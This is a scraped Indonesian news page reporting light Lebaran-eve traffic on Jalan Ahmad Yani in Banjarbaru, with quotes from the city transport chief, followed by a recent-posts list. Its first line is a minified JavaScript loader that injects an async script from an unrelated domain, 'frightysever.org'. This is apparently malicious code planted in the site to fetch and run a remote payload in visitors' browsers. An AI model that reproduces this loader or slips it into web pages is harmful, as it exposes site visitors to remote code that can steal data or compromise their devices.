(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

H-1 Lebaran Lalin di A Yani Banjarbaru Lenggang, Belum Ada Penerapan Rekayasa


KANALKALIMANTAN.COM, BANJARBARU – Arus lalu lintas (Lalin) menjelang Hari Raya Idulfitri di ruas Jalan Ahmad Yani Kota Banjarbaru Kalimantan Selatan terpantau lancar. Situasi ini terjadi pada Selasa (9/4/2024) atau H-1 Lebaran Idulfitri 1445 Hijriyah.

Pantauan Kanalkalimantan.com, dampai dengan pukul 13.00 Wita, kendaraan di titik-titik hambat jalan A Yani seperti di Bundaran Simpang Empat, dan Bundaran Kamaratih Landasan Ulin -bandara lama- tidak terjadi kepadatan kendaraan bermotor yang berarti. Begitu pun di sejumlah persimpangan traffic light.

Lalu lintas di jalan A Yani tampak didominasi kendaraan-kendaraan yang bergerak menuju pusat perbelanjaan, pasar, hingga pusat perbelanjaan makanan.

Baca juga: Menengok Kampung Ketupat di Banjarmasin, Anyaman Dibuat dari Pucuk Daun Nipah

“Lalu lintas di Banjarbaru utamanya kita lihat padat seperti di daerah-daerah pasar maupun pusat perbelanjaan lainnya,” ungkap Kepala Dinas Perhubungan (Dishuh) Kota Banjarbaru, Muhammad Mirhansyah kepada Kanalkalimantan.com.

Pasar Bauntung Banjarbaru di siang hari H-1 Lebaran 1445 H. Foto: wanda

Dijelaskan Kadishub Banjarbaru, kepadatan lalu lintas terlihat jelas jika menyusuri kawasan Pasar Bauntung Banjarbaru, Pasar Ulin Raya hingga pasar dadakan yang didirikan pedagang.

Kendati demikian, sambung dia, di beberapa lokasi lalu lintas terpantau masih aman dan lancar.

Baca juga: Parcel Lebaran di Banjarbaru dari Rp250 Ribu hingga Rp1,5 Juta

Di sisi lain, penerapan rekayasa lalu lintas akan dilakukan oleh Dishub bersama personrl gabungan, jika situasi dan kondisi jalan terlihat padat merayap.

“Namun di situasi lenggang saat ini sepertinya belum, artinya dengan lalu lintas normal seperti ini kita masih bisa memaksimalkan dengan pengaturan lalu lintas yang ada,” jelas dia.

“Seperti dengan pengaturan parkir dan segala macam agar tidak memakai bahu jalan itu masih diberlakukan,” sambungnya.

Selama periode arus mudik Lebaran Idulfitri 1445 Hijriyah, Dishub Kota Banjarbaru juga menempatkan enam hingga tujuh personel, baik untuk berjaga di posko maupun berkeliling patroli di jalanan.

Baca juga: Dirut PLN Lakukan Inspeksi SPKLU Jalur Mudik, 1.299 Unit se Indonesia Siaga Layani Pengguna Mobil Listrik  

“Insyaallah saya perhatikan saat ini agak lenggang, namun personel tetap melakukan penjagaan dari posko sampai di jalanan. Kita kerahkan tiga regu yang berisi 6-7 personel,” tuntas Kadishub. (Kanalkalimantan.com/wanda)

Reporter : wanda
Editor : bie


Muhammad Andi

Recent Posts

Instansi Vertikal Disiapkan Masuk SKPD Instansi Mengajar di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dinas Pendidikan (Disdik) Kota Banjarbaru siap menggandeng instansi vertikal di Kota Banjarbaru,… Read More

52 menit ago

780 Anggota PPK se Kalsel Dilantik, Bertugas 8 Bulan

KANALKALIMANTAN.COM, BANJARBARU - Seluruh Panitia Pemilihan Kecamatan (PPK) di Provinsi Kalimantan Selatan (Kalsel) resmi dilantik… Read More

1 jam ago

25 Anggota PPK Kota Banjarbaru Dilantik, Langsung Bekerja Membentuk Sekretariat

KANALKALIMANTAN.COM, BANJARBARU - Komisi Pemilihan Umum (KPU) Kota Banjarbaru resmi melantik 25 orang anggota Panitia… Read More

5 jam ago

Kearifan Lokal Kalsel Harus Dibaca dan Ditulis Generasi Muda

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Perpustakaan dan Kearsipan Provinsi Kalimantan Selatan (Kalsel) menggelar acara sosialisasi budaya… Read More

16 jam ago

Sekda HSU Sampaikan Raperda Pertanggungjawaban Pelaksanaan APBD 2023, Ini Angka Detailnya

KANALKALIMANTAN.COM, AMUNTAI - Sekretaris Daerah (Sekda) Hulu Sungai Utara (HSU) Adi Lesmana menyebut capaian target… Read More

18 jam ago

Permudah Kebutuhan Transaksi Jemaah Haji di Tanah Suci dengan BRImo

KANALKALIMANTAN.COM- Ibadah haji merupakan salah satu impian bagi umat Islam di seluruh dunia. Agar ibadah… Read More

18 jam ago

This website uses cookies.